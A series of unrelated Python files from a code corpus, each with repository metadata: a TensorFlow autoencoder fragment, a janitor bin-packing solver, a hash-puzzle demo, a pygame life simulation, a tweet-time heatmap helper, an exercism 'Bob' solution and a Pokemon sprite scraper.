output = fullyConnected(up1, name='output', output_size=img_size*img_size)
print("output shape:", output.shape)
print("fc2 shape:", fc2.shape)
with tf.name_scope('cost'):
cost = tf.reduce_mean(tf.square(tf.subtract(output, x)))
return fc2, [cost], [[c1, output]], tf.nn.l2_loss(0.0), [0]
def ConvAutoEncoder(x, name):
with tf.name_scope(name):
"""
We want to get dimensionality reduction of 784 to 196
Layers:
input --> 28, 28 (784)
conv1 --> kernel size: (5,5), n_filters:25 ???make it small so that it runs fast
pool1 --> 14, 14, 25
dropout1 --> keeprate 0.8
reshape --> 14*14*25
FC1 --> 14*14*25, 14*14*5
dropout2 --> keeprate 0.8
FC2 --> 14*14*5, 196 --> output is the encoder vars
FC3 --> 196, 14*14*5
dropout3 --> keeprate 0.8
FC4 --> 14*14*5,14*14*25
dropout4 --> keeprate 0.8
reshape --> 14, 14, 25
deconv1 --> kernel size:(5,5,25), n_filters: 25
upsample1 --> 28, 28, 25
FullyConnected (outputlayer) --> 28* 28* 25, 28 * 28
reshape --> 28*28
"""
input = tf.reshape(x, shape=[-1, 28, 28, 1])
# coding part
c1 = conv2d(input, name='c1', kshape=[5, 5, 1, 25])
p1 = maxpool2d(c1, name='p1')
do1 = dropout(p1, name='do1', keep_rate=0.75)
do1 = tf.reshape(do1, shape=[-1, 14*14*25])
fc1 = fullyConnected(do1, name='fc1', output_size=14*14*5)
do2 = dropout(fc1, name='do2', keep_rate=0.75)
fc2 = fullyConnected(do2, name='fc2', output_size=14*14)
# Decoding part
fc3 = fullyConnected(fc2, name='fc3', output_size=14 * 14 * 5)
do3 = dropout(fc3, name='do3', keep_rate=0.75)
fc4 = fullyConnected(do3, name='fc4', output_size=14 * 14 * 25)
do4 = dropout(fc4, name='do3', keep_rate=0.75)
do4 = tf.reshape(do4, shape=[-1, 14, 14, 25])
dc1 = deconv2d(do4, name='dc1', kshape=[5, 5], n_outputs=25)
up1 = upsample(dc1, name='up1', factor=[2, 2])
output = fullyConnected(up1, name='output', output_size=28*28)
with tf.name_scope('cost'):
cost = tf.reduce_mean(tf.square(tf.subtract(output, x)))
return output, cost
# ---------------------------------
def train_network(x):
prediction, cost = ConvAutoEncoder(x, 'ConvAutoEnc')
with tf.name_scope('opt'):
optimizer = tf.train.AdamOptimizer().minimize(cost)
# Create a summary to monitor cost tensor
tf.summary.scalar("cost", cost)
# Merge all summaries into a single op
merged_summary_op = tf.summary.merge_all()
n_epochs = 5
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# create log writer object
writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph())
for epoch in range(n_epochs):
avg_cost = 0
n_batches = int(mnist.train.num_examples / batch_size)
# Loop over all batches
for i in range(n_batches):
batch_x, batch_y = mnist.train.next_batch(batch_size)
# Run optimization op (backprop) and cost op (to get loss value)
_, c, summary = sess.run([optimizer, cost, merged_summary_op], feed_dict={
x: batch_x, y: batch_y})
# Compute average loss
avg_cost += c / n_batches
# write log
writer.add_summary(summary, epoch * n_batches + i)
# Display logs per epoch step
print('Epoch', epoch+1, ' / ', n_epochs, 'cost:', avg_cost)
print('Optimization Finished')
print('Cost:', cost.eval({x: mnist.test.images}))
#train_network(x)
| true |
ef2164c57fbde17ced7e6191a507b8db0e67d8d0 | Python | bishwanathdas2502/efficient_janitor | /efficient_janitor.py | UTF-8 | 1,325 | 3.171875 | 3 | [] | no_license | import math
def janitor(trash):
# print(list(set(map(lambda x:x>=1.5,trash))))
if len(set(trash)) == 1 and trash[0] == 1.5:
return math.ceil(len(trash)/2)
elif list(set(map(lambda x:x>=1.5,trash))) == [True]:
return len(trash)
else:
trash.sort(reverse = True)
less = list(filter(lambda x:x<1.5,trash))
more = list(filter(lambda x:x>=1.5,trash))
# print(less,more)
count = len(more)
while(len(less) and len(more)):
num1 = more.pop(0)
temp = [num1]
for j in less:
if j + sum(temp) <= 3.0:
temp.append(j)
# print(temp)
less.pop(less.index(j))
# print(count)
# print(less)
if len(less) != 0:
# print('yes')
count3 = 0
sum_ = 0
for i in range(len(less)):
# print(sum_)
sum_ += less[i]
if sum_ > 3.0:
count3 += 1
sum_ = less[i]
if sum_ < 3.0:
count3 += 1
count += count3
# print(count)
return count
trash = []
n = int(input())
for i in range(n):
trash.append(float(input()))
x = janitor(trash)
print('%d' % x)
| true |
23fc1b524c27127966dee6e030605876a29b48b3 | Python | syedmeesamali/Python | /4_Misc/1_Block-Chain/hashing.py | UTF-8 | 234 | 3.3125 | 3 | [] | no_license | from hashlib import sha256
#we know x =5 and (x*y) = ac23dc.........0 (ONE ZERO at END)
x = 7
y = 0 #we don't know value of y yet
while sha256(f'{x*y}'.encode()).hexdigest()[-1] != "0":
y += 1
print(f'The solution is y = {y}')
| true |
90933c253601fd72c737d8980c65f71750197f98 | Python | aashishpeepra/lifeform-simulation-python | /parsciro.py | UTF-8 | 3,952 | 3.09375 | 3 | [] | no_license | import random
import time
from lifeform import Lifeform
import pygame
import sys
class Parsciro():
def __init__(self,initial,red,green,blue,energy):
self.allLife =[]
self.ROUNDS = initial
self.INFO = {1:red,2:green,3:blue}
self.ENERGY = energy
pygame.init() #STARTS THE PYGAME
self.SCREENSIZE = (1000,1000) #HEIGHT, WIDTH OF THE SCREEN
self.SCREEN = pygame.display.set_mode(self.SCREENSIZE) #CREATE A SCREEN -> screen
def initialize_life(self):
for i in range(self.ROUNDS):
firstForm = Lifeform(1,self.INFO[1],self.ENERGY)
secondForm = Lifeform(2,self.INFO[2],self.ENERGY)
thirdForm = Lifeform(3,self.INFO[3],self.ENERGY)
firstForm.set_random_coords()
secondForm.set_random_coords()
thirdForm.set_random_coords()
self.allLife.append(firstForm)
self.allLife.append(secondForm)
self.allLife.append(thirdForm)
print(firstForm)
# print(self.allLife)
def check_collision(self):
coordinates = [each.get_coords() for each in self.allLife]
i = 0
length = len(coordinates)
while i < length:
if coordinates[i] in coordinates[i+1:]:
index = coordinates[i+1:].index(coordinates[i]) + i+1
self.allLife[i].perform_collision(self.allLife[index])
if self.allLife[i].get_type() == self.allLife[index].get_type() :
newLife = Lifeform(self.allLife[i].get_type(),self.INFO[self.allLife[i].get_type()],self.ENERGY)
newLife.set_random_coords()
self.allLife.append(newLife)
coordinates.append(newLife.get_coords())
length+=1
print("NEW LIFe")
i+=1
def update_life(self):
#BACKGROUND COLOR change -> wHITE -> (255,255,255) , black -> (0,0,0)
self.SCREEN.fill((255,255,255))
for each in self.allLife:
if each.get_energy()<=0:
print(" --->Removed",each)
self.allLife.remove(each)
continue
each.move()
# imageBase = {1: "nameOfImage.png" ,2 :"nameOfSecondImahge.png",3:"Thirdname.png"}
# self.SCREEN.asurf = pygame.image.load("./images/"+imageBase[each.get_type()]) #"/images/nameOfImage.png"
pygame.draw.circle(self.SCREEN,each.get_color(),each.get_coords(),5)
print(each)
pygame.display.update()
pygame.display.flip()
def life_loop(self):
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
counter = {1:0,2:0,3:0}
for each in self.allLife:
counter[each.get_type()]+=1
NAMES = {1:"Chlorella",2:"Amoeba",3:"Halobacteria"}
for each in counter.keys():
print(NAMES[each],":",counter[each])
sys.exit()
clock = pygame.time.Clock()
clock.tick(200)
self.check_collision()
self.update_life()
# pygame.display.update()
# self.SCREEN.Rect(0,0,0)
time.sleep(0.05)
if __name__ == "__main__":
intitialLifeforms = int(input("Enter Initial number of lifeforms : "))
print("SET MOVEMENT PARAMETERS")
print("RED Movement, Enter single integer ")
red = int(input())
print("GREEN Movement, Enter single integer ")
green = int(input())
print("BLUE Movement, Enter single integer ")
blue = int(input())
energy = int(input("Enter Initial energy level "))
World = Parsciro(intitialLifeforms,red,green,blue,energy)
World.initialize_life()
World.life_loop()
| true |
c7b981deb33fc7bcc4db3165feeae6a24f59e538 | Python | aujohankn/Twitter-bots | /twitter_timemaps.py | UTF-8 | 383 | 2.5625 | 3 | [] | no_license | import os
import pandas as pd
import tm_tools
def heatmap_plot(userID):
# Reads the tweet timestamps from a specific Twitter account and generates the heated time map
print("Heatmap plot")
path = os.getcwd()+"\ScrapedData\Tweets\\"
df = pd.read_csv(path+"tweet" + str(userID) + ".csv")['created_at'].values.tolist()
tm_tools.analyze_tweet_times(str(userID), df) | true |
0ac222a08252ae742a95e625bc6cfbc4218ffbf0 | Python | glennj/exercism.io | /python/bob/bob.py | UTF-8 | 412 | 3.3125 | 3 | [] | no_license | def response(phrase):
phrase = phrase.rstrip()
shouting = phrase.isupper()
asking = phrase.endswith('?')
silence = phrase == ""
if shouting and asking:
return "Calm down, I know what I'm doing!"
elif shouting:
return "Whoa, chill out!"
elif asking:
return "Sure."
elif silence:
return "Fine. Be that way!"
else:
return "Whatever."
| true |
730a0d5b08ff4483baef3bc4b990324c32c95fb3 | Python | josh-perry/pokemon-hm-slave-finder | /scraper/get_pokemon_img.py | UTF-8 | 1,310 | 2.921875 | 3 | [] | no_license | import requests
import os
import time
art_urls = [
"https://www.serebii.net/pokearth/sprites/rb/{}.png",
"https://www.serebii.net/pokearth/sprites/gold/{}.png",
"https://www.serebii.net/pokearth/sprites/rs/{}.png",
"https://www.serebii.net/pokearth/sprites/dp/{}.png"
]
pokemon_count = [
151,
251,
386,
493
]
def get_pokemon_art(gen):
print("Getting img for gen {}".format(gen))
gen -= 1
save_directory = "cache/img/gen{}".format(gen+1)
os.makedirs(save_directory, exist_ok=True)
for i in range(1, pokemon_count[gen] + 1):
filename = str(i).zfill(3)
img_url = art_urls[gen].format(filename)
save_path = "{}/{}.png".format(save_directory, filename)
if os.path.isfile(save_path):
print("Skipping {} as it already exists".format(filename))
continue
r = requests.get(img_url)
if r.status_code != 200:
print("{} returned a {}!".format(img_url, r.status_code))
time.sleep(30)
continue
with open(save_path, "wb+") as file:
for chunk in r:
file.write(chunk)
print("{} saved".format(save_path))
time.sleep(1)
if __name__ == '__main__':
for gen in range(1, 4+1):
get_pokemon_art(gen)
| true |